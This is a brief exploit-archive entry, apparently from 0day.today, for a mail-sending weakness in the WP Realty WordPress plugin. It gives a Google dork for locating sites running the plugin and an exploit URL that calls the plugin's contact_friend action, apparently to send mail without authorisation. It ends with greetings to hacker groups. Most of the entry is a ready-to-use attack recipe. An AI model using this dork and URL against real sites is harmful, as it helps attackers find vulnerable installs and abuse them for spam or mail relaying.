Full title: Wordpress WP Realty Plugin - eMail Sender Vulnerability Category: web applications Platform: php # Exploit Title: Wordpress - wp-realty - eMail Sender # Google Dork: inurl:"/wp-content/plugins/wp-realty/" # Vendor: http://wprealty.org/ # Date: 10/08/2013 # Exploit Author: Napsterakos Link: http://localhost/wp-content/plugins/wp-realty/ Exploit: http://localhost/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=10 Greetz To : n0m0r3 - Prappo Prince - United Bangladeshi Hackers . # 0day.today @ http://0day.today/